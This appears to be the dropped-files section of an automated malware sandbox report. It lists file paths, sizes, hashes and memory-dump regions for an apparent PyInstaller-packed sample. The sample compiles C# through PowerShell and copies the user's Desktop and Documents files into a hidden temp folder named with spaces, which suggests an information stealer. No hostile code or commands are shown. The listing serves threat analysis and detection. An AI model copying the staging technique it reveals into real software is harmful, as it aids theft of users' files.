C:\Users\Admin\AppData\Local\Temp\_MEI45442\sqlite3.dll

Filesize
644KB

MD5
68b435a35f9dcbc10b3cd4b30977b0bd

SHA1
9726ef574ca9bda8ec9ab85a5b97adcdf148a41f

SHA256
240d6d3efac25af08fe41a60e181f8fdcb6f95da53b3fad54b0f96680e7a8277

SHA512
8e133b72bd3776f961258793c2b82d2cd536c7ae0ed0241daa2f67d90a6968f563b72f74a1c33d9bdfb821b796612faa7a73a712369ff3b36d968e57bfcdd793

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI45442\unicodedata.pyd

Filesize
296KB

MD5
6dd43e115402d9e1c7cd6f21d47cfcf5

SHA1
c7fb8f33f25b0b75fc05ef0785622aa4ec09503c

SHA256
2a00f41bbc3680807042fc258f63519105220053fb2773e7d35480515fad9233

SHA512
72e266eb1ce5cbbcfd1d2a6f864538efd80b3ed844e003e2bd9566708fee0919447290a3b559ea27c32794f97a629a8fe8fc879654ffa609fca5c053dac70c69

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcrxdoqb.ocp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\srroifnz\srroifnz.dll

Filesize
4KB

MD5
5f749927f1d1f1159345480e9601bed3

SHA1
823f4817d7d6214be95a95f73ab39dbe05a05175

SHA256
b501d793b691e73e2583708e42998b3d4fb5715f4585646139dea640315e6995

SHA512
bc49bded2ab22e20ddd5adba230d25bc89930d977effe7bc354ce31129c5bbfd28c8703a7b7ce02c6f3a52052cdf515b536b131040c4b4431ac545315eda461d

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\ConfirmUndo.txt

Filesize
200KB

MD5
2c180a1c027b9ef4cb4d547711599fb5

SHA1
91e64861007bc19708976cc0435195ab80294427

SHA256
08086384d80819cdec75a2e0aebeb2dd4f9a4137e2cdfa830d4cb8a59eda2091

SHA512
386ec37e9abaeb365e4dd788084b9db048ce21b2fb4547ccbf5a11921a31d26dc8b2a56c0c2f86c5e66beef335afcb3762e5fcdd938de1eaa1c13bcfe8b36819

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\EditRename.docx

Filesize
20KB

MD5
96c2b0c8c3a5c0e4a2e395348f9da39f

SHA1
d1baae9e9e6b5a8d4e8f653af8e61b144b682eb4

SHA256
882b3e4261aba6b6c4a1bd07f35273982be95d1aa8853d7e2f671c0ebdc1a392

SHA512
623cba2e9e6f496e3fd82ed2277933d633b80c7dfba9fd1ba739afea077d0ca7d56b17d9f9027ee695d92da41e2cf6916603a0f3745c8550325ac3cae51e03f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\EnterRevoke.png

Filesize
310KB

MD5
a0c64bc7e4e09fd144ad228ac357f739

SHA1
95d397ccab9bf01a07099645a5dc87d61c51b28b

SHA256
3ba8ba038958ec4b71cf7d9457825f65432e3ee1942dceb427a3fd70376fcb4d

SHA512
c1de0cf33a1c338ecce7994ab478f0793cb1f4d2baf19eab2525643bd18ab201678d1993ea2ecd38a51cf7949e35e70748d6281b049b4bf2dcf05c1f1e46b994

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\ProtectComplete.xlsx

Filesize
371KB

MD5
c204fcc4d673ccaef8239b95c9a590e3

SHA1
13e11046a2d60ed02e7a37def7a8137c5a7be7c7

SHA256
234e5868287057355a671668676bca7422a76cc1928f27d179feab3b11e73340

SHA512
90a6fef45e3b0aa2b5e5c5b09dce265003fa505f0d70301ea209c1b7b88145146d6e5497d76098083f87ea88557d34f57b5f7c9dcc04e2a6a4812450cc9f1bcc

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\ReadResume.jpeg

Filesize
176KB

MD5
ce5b894abf883afc5beea4645b4da173

SHA1
db8f20d2e6cfcc0696b3d43b26a09069178aaf9a

SHA256
495bbbf3f2bdca21cefbd7d5ea809b918870c4663b5d8f38a9ca294df1eddabf

SHA512
356feb7dbd7c87958086afb36173c0b110847772e06ac532898b5e3642d22ed135a467fc2dd047abbf3571540775f20d7d6207f8a777dab5c6e82bf31d411427

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\ResolveExport.docx

Filesize
18KB

MD5
b28b4cba88903ba70d041c721010836d

SHA1
0737575b31b7f993bbe0ed09da70752ef220bc9a

SHA256
ab2ef377d49ceb642aa5650c731424ff8ad8d1b4dd3c1b13c467e92a3e90e189

SHA512
639a96541bddf478c60884c5a8cbec8ecdf2f06ac69af0e7e986b82f67dcc2dd2b0465b479de93558a612b2fe08e38981c01a4f4433f6d6b93c3cf1c923c293e

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\SendWrite.docx

Filesize
20KB

MD5
51aad06c3ae37e84a76299c07254988c

SHA1
c092453d608e73cef5d4947cda0c5fc1c5ed5ef2

SHA256
144735e94a16a3cd43658a0782e985978148ef0706a7ff61e4f09e03cdbc5781

SHA512
89ed35b8bf029f868a99793410a577e8de3cbd272e21eaed014472e698243a5ca4012f2c406fcfb73d93ff062f561a13a093e9e8a469301fb4cd53571e84f78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\WriteConfirm.xlsx

Filesize
12KB

MD5
3fd7171b9b4c3b9ad2db294d0042fc31

SHA1
51c3945374dad8919671f0e505f7c6fa6cca9f18

SHA256
e3bcc3d8a5d90a916adbf86adcbf8b6160caceefdcc13491586ad6865f104d83

SHA512
83afd863835d67d9bcdee6a5260a9b821b2d4b13416149cb871ff50cc175d9b84af291a3db60040840c3afd0b058f1d6877e575e5cc940a2b312f3312bba05b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\BackupApprove.ppsm

Filesize
940KB

MD5
7812a2383e421ee5bbb777513bb13555

SHA1
e67ef33854d7e364389d88d73a5131910791c84a

SHA256
69f4d3099b2312649d75bc8ee24ab016095ddc6477e295035d1f9561c2d34390

SHA512
e2a290b71f37d09b46de7ff85e0dba0bc1fad43e11a384371f18e16b2bed3a47888c57d41c723eca74b3538231346805ac3e9b8969be9242a65a1a8daa466f6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\EditOptimize.xlsx

Filesize
10KB

MD5
316c506042ef5c1179208c5c2cedac4b

SHA1
b2f16ef4313efd0a6a98ed8852fda0aecda7e2e2

SHA256
de09642631a6470297bf1ab68c684645174934e46cc9895fbdbc7756eabf92c7

SHA512
b392e1f8f33905dd07a3f03ee47459ce823cf8f7ba6cdc1f3f4c6df83e46cc5c22c57e3cf90d5525e8f74964d383a151074a991c083304e4cc4a35ccfab5d2f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\ExpandStart.docx

Filesize
13KB

MD5
32adee4d523d15bd1e7d2125f63aef57

SHA1
6e7d1c846749dd8c84f216dd608327b4a2a35063

SHA256
028285c2ea139799595e64bd2a7258f6ca68a54769290f361638a3a50b57947b

SHA512
cf81566172dc5d2322ac2f911212742feaeb5338dd64c64a1e4d57ab936f4979fd191895a7c228da735003438020f5eeaf1b1b8edb53ab4ffa07b2948ce469b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\PushFormat.docx

Filesize
20KB

MD5
5bbd6ee6bdccc3cd2567a5367e1aec6c

SHA1
0cc2dd0bb872ceae9d867467196383007a6be62a

SHA256
31ce274a6cebf33f8581ea47ee97b4067264f1d5e2e7ee77643604532dacddec

SHA512
5eb47e53e5b3971c3b04f0c63071afef85253da620e7c4f5f5ebf5107a5df69270ae2e826d10ca04f6d19f2877359b3218d185944fd5d6a214f7e4095e88757b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\ReadRestart.csv

Filesize
1.8MB

MD5
6bb387bcd6eb13988cb47d9360993d0c

SHA1
7ea816e513ce8db5f2282e76624c4df4af3fd23d

SHA256
a0d119c96ac6cd05eaf7505539a45521f249f1477f4e477d78c683e0c65ad9c5

SHA512
48771d935a35a3e76a1215acd0f4184ec8dc25eb6d433a029fc210810d644a99096b7e8eb9b552d0fc88c50db586a6e9a0d439164633d16056ed8a5b544fa4fe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\srroifnz\CSCEE3C66812D047C183F132F1E7DFAD4B.TMP

Filesize
652B

MD5
3caf9f08ed2b6054efeca216be5355aa

SHA1
c5d9220a4bf7fa13440ce281b59b444ccd8ef3be

SHA256
d1894f89e925d78affcc57455062ba6b7b8d8ca36257184dd37ddb4bf470a4c1

SHA512
433c92cd5bcc5a4ce88adb9fb282573d781b139638f3d547b450fe3a0d88e1726adc40be84b892bfeb554ab4f83a4433dcd36c4146e21b42d2a8b60d020f7dc9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\srroifnz\srroifnz.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\srroifnz\srroifnz.cmdline

Filesize
607B

MD5
9b15b4d85dc3f55bcb7ab76f3e82a987

SHA1
e54b6c42f001a91c591c0b512b3053f02bc652b8

SHA256
3dd3dd04177f79a2037d41ca48b120c0d5cf810c073f13cbd40efad100638493

SHA512
f7815dca3335f291662616ea54a0405dcff6be16845e8c0292039ee57ca785894251cbabfa5bfaf31e713206131803bd3a6c1280e5101dbe23831f86a278c07a

Download Submit
memory/468-225-0x000001D7C0240000-0x000001D7C0248000-memory.dmp

Filesize
32KB

Download
memory/1320-93-0x00000294B11D0000-0x00000294B11F2000-memory.dmp

Filesize
136KB

Download
memory/2752-29-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp

Filesize
148KB

Download
memory/2752-54-0x00007FFCDEF80000-0x00007FFCDEFAD000-memory.dmp

Filesize
180KB

Download
memory/2752-86-0x00007FFCDB8E0000-0x00007FFCDB904000-memory.dmp

Filesize
144KB

Download
memory/2752-32-0x00007FFCE0800000-0x00007FFCE080F000-memory.dmp

Filesize
60KB

Download
memory/2752-367-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp

Filesize
148KB

Download
memory/2752-84-0x00007FFCDC210000-0x00007FFCDC22A000-memory.dmp

Filesize
104KB

Download
memory/2752-85-0x00007FFCDABB0000-0x00007FFCDACCA000-memory.dmp

Filesize
1.1MB

Download
memory/2752-78-0x00007FFCDEF80000-0x00007FFCDEFAD000-memory.dmp

Filesize
180KB

Download
memory/2752-79-0x00007FFCDC1C0000-0x00007FFCDC1CD000-memory.dmp

Filesize
52KB

Download
memory/2752-25-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp

Filesize
6.8MB

Download
memory/2752-295-0x00007FFCDB520000-0x00007FFCDB553000-memory.dmp

Filesize
204KB

Download
memory/2752-76-0x00007FFCDB360000-0x00007FFCDB374000-memory.dmp

Filesize
80KB

Download
memory/2752-70-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp

Filesize
6.8MB

Download
memory/2752-71-0x00007FFCDB380000-0x00007FFCDB44D000-memory.dmp

Filesize
820KB

Download
memory/2752-74-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp

Filesize
148KB

Download
memory/2752-72-0x000001A665170000-0x000001A665699000-memory.dmp

Filesize
5.2MB

Download
memory/2752-73-0x00007FFCCB6C0000-0x00007FFCCBBE9000-memory.dmp

Filesize
5.2MB

Download
memory/2752-66-0x00007FFCDB520000-0x00007FFCDB553000-memory.dmp

Filesize
204KB

Download
memory/2752-62-0x00007FFCDC1F0000-0x00007FFCDC209000-memory.dmp

Filesize
100KB

Download
memory/2752-64-0x00007FFCDF770000-0x00007FFCDF77D000-memory.dmp

Filesize
52KB

Download
memory/2752-60-0x00007FFCDB670000-0x00007FFCDB7EF000-memory.dmp

Filesize
1.5MB

Download
memory/2752-58-0x00007FFCDB8E0000-0x00007FFCDB904000-memory.dmp

Filesize
144KB

Download
memory/2752-56-0x00007FFCDC210000-0x00007FFCDC22A000-memory.dmp

Filesize
104KB

Download
memory/2752-181-0x00007FFCDB670000-0x00007FFCDB7EF000-memory.dmp

Filesize
1.5MB

Download
memory/2752-311-0x00007FFCDB380000-0x00007FFCDB44D000-memory.dmp

Filesize
820KB

Download
memory/2752-312-0x000001A665170000-0x000001A665699000-memory.dmp

Filesize
5.2MB

Download
memory/2752-314-0x00007FFCCB6C0000-0x00007FFCCBBE9000-memory.dmp

Filesize
5.2MB

Download
memory/2752-335-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp

Filesize
6.8MB

Download
memory/2752-350-0x00007FFCDABB0000-0x00007FFCDACCA000-memory.dmp

Filesize
1.1MB

Download
memory/2752-341-0x00007FFCDB670000-0x00007FFCDB7EF000-memory.dmp

Filesize
1.5MB

Download
memory/2752-336-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp

Filesize
148KB

Download
memory/2752-351-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp

Filesize
6.8MB

Download
memory/2752-366-0x00007FFCCB6C0000-0x00007FFCCBBE9000-memory.dmp

Filesize
5.2MB

Download
memory/2752-379-0x00007FFCDABB0000-0x00007FFCDACCA000-memory.dmp

Filesize
1.1MB

Download
memory/2752-378-0x00007FFCDC1C0000-0x00007FFCDC1CD000-memory.dmp

Filesize
52KB

Download
memory/2752-377-0x00007FFCDB360000-0x00007FFCDB374000-memory.dmp

Filesize
80KB

Download
memory/2752-376-0x00007FFCDB380000-0x00007FFCDB44D000-memory.dmp

Filesize
820KB

Download
memory/2752-375-0x00007FFCDB520000-0x00007FFCDB553000-memory.dmp

Filesize
204KB

Download
memory/2752-374-0x00007FFCDF770000-0x00007FFCDF77D000-memory.dmp

Filesize
52KB

Download
memory/2752-373-0x00007FFCDC1F0000-0x00007FFCDC209000-memory.dmp

Filesize
100KB

Download
memory/2752-372-0x00007FFCDB670000-0x00007FFCDB7EF000-memory.dmp

Filesize
1.5MB

Download
memory/2752-371-0x00007FFCDB8E0000-0x00007FFCDB904000-memory.dmp

Filesize
144KB

Download
memory/2752-370-0x00007FFCDC210000-0x00007FFCDC22A000-memory.dmp

Filesize
104KB

Download
memory/2752-369-0x00007FFCDEF80000-0x00007FFCDEFAD000-memory.dmp

Filesize
180KB

Download
memory/2752-368-0x00007FFCE0800000-0x00007FFCE080F000-memory.dmp

Filesize
60KB

Download
memory/4992-87-0x00007FFCCAA83000-0x00007FFCCAA85000-memory.dmp

Filesize
8KB

Download